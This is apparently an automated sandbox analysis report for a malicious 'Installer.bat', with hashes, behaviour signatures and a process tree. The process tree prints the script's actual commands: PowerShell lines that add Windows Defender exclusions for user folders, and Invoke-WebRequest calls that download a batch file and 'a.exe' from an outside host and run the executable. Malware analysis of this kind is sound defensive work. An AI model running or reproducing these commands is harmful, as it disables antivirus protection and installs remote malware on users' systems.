Analysis
-
max time kernel
41s -
max time network
45s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
04/10/2022, 12:43
Static task
static1
Behavioral task
behavioral1
Sample
Installer.bat
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Installer.bat
Resource
win10v2004-20220812-en
General
-
Target
Installer.bat
-
Size
2KB
-
MD5
150dd36ccecbfe34cc6d50bacaea899d
-
SHA1
7860408e7ee76cf3a23289e0cdfdb8758a012f08
-
SHA256
ebb2bb6413b8b86576c4a2c8ec645a0013d7bed49c16ed6c3cc5b284bfa15bc2
-
SHA512
ae281a5a37a6ef9f331a43947d740e08e4c491f6f8cfabbd113a957425b14374bf1e8390a7c80a44c382141ff7d3c85e724020773e781eca32468bf1d063b529
Malware Config
Signatures
-
Suspicious behavior: EnumeratesProcesses 14 IoCs
pid Process 1908 powershell.exe 984 powershell.exe 1692 powershell.exe 1140 powershell.exe 1196 powershell.exe 1228 powershell.exe 1284 powershell.exe 1980 powershell.exe 1936 powershell.exe 1976 powershell.exe 1528 powershell.exe 468 powershell.exe 1200 powershell.exe 916 powershell.exe -
Suspicious use of AdjustPrivilegeToken 14 IoCs
description pid Process Token: SeDebugPrivilege 1908 powershell.exe Token: SeDebugPrivilege 984 powershell.exe Token: SeDebugPrivilege 1692 powershell.exe Token: SeDebugPrivilege 1140 powershell.exe Token: SeDebugPrivilege 1196 powershell.exe Token: SeDebugPrivilege 1228 powershell.exe Token: SeDebugPrivilege 1284 powershell.exe Token: SeDebugPrivilege 1980 powershell.exe Token: SeDebugPrivilege 1936 powershell.exe Token: SeDebugPrivilege 1976 powershell.exe Token: SeDebugPrivilege 1528 powershell.exe Token: SeDebugPrivilege 468 powershell.exe Token: SeDebugPrivilege 1200 powershell.exe Token: SeDebugPrivilege 916 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 900 wrote to memory of 1920 900 cmd.exe 28 PID 900 wrote to memory of 1920 900 cmd.exe 28 PID 900 wrote to memory of 1920 900 cmd.exe 28 PID 900 wrote to memory of 2008 900 cmd.exe 29 PID 900 wrote to memory of 2008 900 cmd.exe 29 PID 900 wrote to memory of 2008 900 cmd.exe 29 PID 2008 wrote to memory of 1908 2008 cmd.exe 30 PID 2008 wrote to memory of 1908 2008 cmd.exe 30 PID 2008 wrote to memory of 1908 2008 cmd.exe 30 PID 900 wrote to memory of 944 900 cmd.exe 31 PID 900 wrote to memory of 944 900 cmd.exe 31 PID 900 wrote to memory of 944 900 cmd.exe 31 PID 944 wrote to memory of 984 944 cmd.exe 32 PID 944 wrote to memory of 984 944 cmd.exe 32 PID 944 wrote to memory of 984 944 cmd.exe 32 PID 900 wrote to memory of 1868 900 cmd.exe 33 PID 900 wrote to memory of 1868 900 cmd.exe 33 PID 900 wrote to memory of 1868 900 cmd.exe 33 PID 1868 wrote to memory of 1692 1868 cmd.exe 34 PID 1868 wrote to memory of 1692 1868 cmd.exe 34 PID 1868 wrote to memory of 1692 1868 cmd.exe 34 PID 900 wrote to memory of 1096 900 cmd.exe 36 PID 900 wrote to memory of 1096 900 cmd.exe 36 PID 900 wrote to memory of 1096 900 cmd.exe 36 PID 1096 wrote to memory of 1140 1096 cmd.exe 35 PID 1096 wrote to memory of 1140 1096 cmd.exe 35 PID 1096 wrote to memory of 1140 1096 cmd.exe 35 PID 900 wrote to memory of 1828 900 cmd.exe 38 PID 900 wrote to memory of 1828 900 cmd.exe 38 PID 900 wrote to memory of 1828 900 cmd.exe 38 PID 1828 wrote to memory of 1196 1828 cmd.exe 37 PID 1828 wrote to memory of 1196 1828 cmd.exe 37 PID 1828 wrote to memory of 1196 1828 cmd.exe 37 PID 900 wrote to memory of 1112 900 cmd.exe 40 PID 900 wrote to memory of 1112 900 cmd.exe 40 PID 900 wrote to memory of 1112 900 cmd.exe 40 PID 1112 wrote to memory of 1228 1112 cmd.exe 39 PID 1112 wrote to memory of 1228 1112 cmd.exe 39 PID 1112 wrote to memory of 1228 1112 cmd.exe 39 PID 900 wrote to memory of 1876 900 cmd.exe 42 PID 900 wrote to memory of 1876 900 cmd.exe 42 PID 900 wrote to memory of 1876 900 cmd.exe 42 PID 1876 wrote to memory of 1284 1876 cmd.exe 41 PID 1876 wrote to memory of 1284 1876 cmd.exe 41 PID 1876 wrote to memory of 1284 1876 cmd.exe 41 PID 900 wrote to memory of 1892 900 cmd.exe 44 PID 900 wrote to memory of 1892 900 cmd.exe 44 PID 900 wrote to memory of 1892 900 cmd.exe 44 PID 1892 wrote to memory of 1980 1892 cmd.exe 43 PID 1892 wrote to memory of 1980 1892 cmd.exe 43 PID 1892 wrote to memory of 1980 1892 cmd.exe 43 PID 900 wrote to memory of 1588 900 cmd.exe 45 PID 900 wrote to memory of 1588 900 cmd.exe 45 PID 900 wrote to memory of 1588 900 cmd.exe 45 PID 1588 wrote to memory of 1936 1588 cmd.exe 46 PID 1588 wrote to memory of 1936 1588 cmd.exe 46 PID 1588 wrote to memory of 1936 1588 cmd.exe 46 PID 900 wrote to memory of 1752 900 cmd.exe 48 PID 900 wrote to memory of 1752 900 cmd.exe 48 PID 900 wrote to memory of 1752 900 cmd.exe 48 PID 1752 wrote to memory of 1976 1752 cmd.exe 47 PID 1752 wrote to memory of 1976 1752 cmd.exe 47 PID 1752 wrote to memory of 1976 1752 cmd.exe 47 PID 900 wrote to memory of 1120 900 cmd.exe 49
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\Installer.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:900 -
C:\Windows\system32\cacls.exe"C:\Windows\system32\cacls.exe" "C:\Windows\system32\config\system"2⤵PID:1920
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'2⤵
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1908
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\'2⤵
- Suspicious use of WriteProcessMemory
PID:944 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:984
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming*'2⤵
- Suspicious use of WriteProcessMemory
PID:1868 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming*'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\*'2⤵
- Suspicious use of WriteProcessMemory
PID:1096
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'2⤵
- Suspicious use of WriteProcessMemory
PID:1828
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\'2⤵
- Suspicious use of WriteProcessMemory
PID:1112
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming'2⤵
- Suspicious use of WriteProcessMemory
PID:1876
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\'2⤵
- Suspicious use of WriteProcessMemory
PID:1892
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming*'2⤵
- Suspicious use of WriteProcessMemory
PID:1588 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming*'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\*'2⤵
- Suspicious use of WriteProcessMemory
PID:1752
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin'2⤵PID:1120
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin'3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
-
C:\Windows\system32\cmd.execmd.exe /c powershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\'2⤵PID:1736
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://updatea1.com/sh1z01/index/e6a5614c379561c94004c531781ee1c5/?servername=msi -OutFile 105.bat2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1200
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest https://updatea1.com/sh1z01/index/d2ef590c0310838490561a205469713d/?servername=msi -OutFile a.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:916
-
-
C:\Windows\system32\cmd.execmd /c a.exe2⤵PID:1480
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\*'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1140
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1196
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1228
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1284
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\AppData\Roaming\'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1980
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\*'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1976
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionProcess 'C:\Users\Admin\'1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:468
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD5d1ea1b20591d7910c1792077aa06e913
SHA1ebb8f2296c3e736ec9b54c7147a5117577b70a1c
SHA256ed11d025093b5e6a1c904117118bb74277a53eca1c549d7ce8f64354115c46bc
SHA5126b64276522f109897960c7abe1e2ec83aece3ae9a5dc1fb3798b49e905bae90d21bbfe4aec951230d7b59901c42c364f2d6b03aab8a255ccf40cc8fd33c2b043